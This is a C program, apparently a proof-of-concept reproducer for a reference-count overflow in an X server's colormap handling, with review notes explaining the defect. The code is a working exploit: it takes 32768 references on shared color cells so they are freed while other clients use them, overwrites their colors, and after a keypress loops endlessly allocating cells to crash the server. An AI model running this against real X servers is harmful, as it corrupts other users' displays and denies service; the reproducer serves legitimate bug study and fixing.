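/*
 * free and overwrite target color cells using "refcnt overflow" BUG
 * visual : 8bit pseudo color
 *
 * Review notes:
 * - This is a reproducer for a server-side defect; the fix belongs in the
 *   X server's colormap code, not in this client.  The affected server
 *   and version are not named on this page.
 * - As far as this program shows, the trigger is a single client that
 *   allocates the same shared color cell `imax` times and then
 *   disconnects.  Presumably the per-cell reference count is too narrow
 *   to hold that many references, so the disconnect releases a cell that
 *   other clients still use -- confirm against the server source.  A
 *   server should refuse or saturate the allocation before the counter
 *   can wrap.
 * - Seen from the server, phase 1 is tens of thousands of identical
 *   AllocNamedColor requests from one connection.
 * - Phase 3 is a denial of service against the server the program is
 *   connected to; it only starts after a line is read from stdin.
 */
#include <stdio.h>
#include <X11/Xlib.h>

int main(int argc, char **argv)
{
    Display *disp;
    Colormap cmap;
    XColor c0, c1;
    unsigned long px[1];
    unsigned long pl[1];
    unsigned int nplanes = 0;
    unsigned int npixels = 1;
    unsigned int imax = 32768;   /* total references taken per target cell */
    unsigned int i;
    char dummy[8];
    const char *target[] = {
        "#FFFFFF",  /* assume pixel #0 is white */
        "#000000"   /* assume pixel #1 is black */
    };
    const char *crack[] = {
        "#FFC0CB",  /* pixel #0 may become pink */
        "#000080"   /* pixel #1 may become navy */
    };

    (void)argc;
    (void)argv;

    /* !! try to overflow the refcnt !! */
    disp = XOpenDisplay(NULL);
    if (disp == NULL) {
        /* XOpenDisplay() returns NULL when no server is reachable. */
        fprintf(stderr, "cannot open display\n");
        return 1;
    }
    cmap = DefaultColormap(disp, 0);

    /*
     * c0.pixel is only defined when the allocation succeeds, so check the
     * status before printing it.  pixel is an unsigned long: use %lu.
     */
    if (!XAllocNamedColor(disp, cmap, target[0], &c0, &c1)) {
        fprintf(stderr, "cannot allocate %s\n", target[0]);
        XCloseDisplay(disp);
        return 1;
    }
    printf("Target1 : #%lu (%s)\n", c0.pixel, target[0]);

    if (!XAllocNamedColor(disp, cmap, target[1], &c0, &c1)) {
        fprintf(stderr, "cannot allocate %s\n", target[1]);
        XCloseDisplay(disp);
        return 1;
    }
    printf("Target2 : #%lu (%s)\n", c0.pixel, target[1]);

    /*
     * One reference per target was taken above; this loop takes the
     * remaining imax - 1.  Return values are ignored here, as in the
     * original.
     */
    for (i = 1; i < imax; i++) {
        XAllocNamedColor(disp, cmap, target[0], &c0, &c1);
        XAllocNamedColor(disp, cmap, target[1], &c0, &c1);
        printf("\r[%5u/%5u] ", i + 1, imax);
        fflush(stdout);
    }
    printf("\n");
    XCloseDisplay(disp);
    /* !! target shared color cells may be released now !! */

    /* !! try to overwrite the RGB value !! */
    disp = XOpenDisplay(NULL);
    if (disp == NULL) {
        fprintf(stderr, "cannot open display\n");
        return 1;
    }
    cmap = DefaultColormap(disp, 0);

    if (!XAllocNamedColor(disp, cmap, crack[0], &c0, &c1)) {
        fprintf(stderr, "cannot allocate %s\n", crack[0]);
        XCloseDisplay(disp);
        return 1;
    }
    printf("Overwrite #%lu with %s\n", c0.pixel, crack[0]);

    if (!XAllocNamedColor(disp, cmap, crack[1], &c0, &c1)) {
        fprintf(stderr, "cannot allocate %s\n", crack[1]);
        XCloseDisplay(disp);
        return 1;
    }
    printf("Overwrite #%lu with %s\n", c0.pixel, crack[1]);

    printf("Press [Enter] to crash Xserver...\n");
    fflush(stdout);
    /*
     * The original called fflush(stdin), which is undefined behavior in
     * ISO C; it is dropped.  If no line can be read (EOF or error), stop
     * instead of entering the last phase unconfirmed.
     */
    if (fgets(dummy, sizeof(dummy), stdin) == NULL) {
        XCloseDisplay(disp);
        return 1;
    }

    /* !! free cell counter may be broken, too !! */
    /* No exit condition: as written, this loop never returns to main. */
    for (i = 1; ; i++) {
        XAllocColorCells(disp, cmap, False, pl, nplanes, px, npixels);
        printf("\r[%5u] ", i);
        fflush(stdout);
    }

    /* Not reached; kept from the original. */
    printf("\n");
    XCloseDisplay(disp);
    return 0;
}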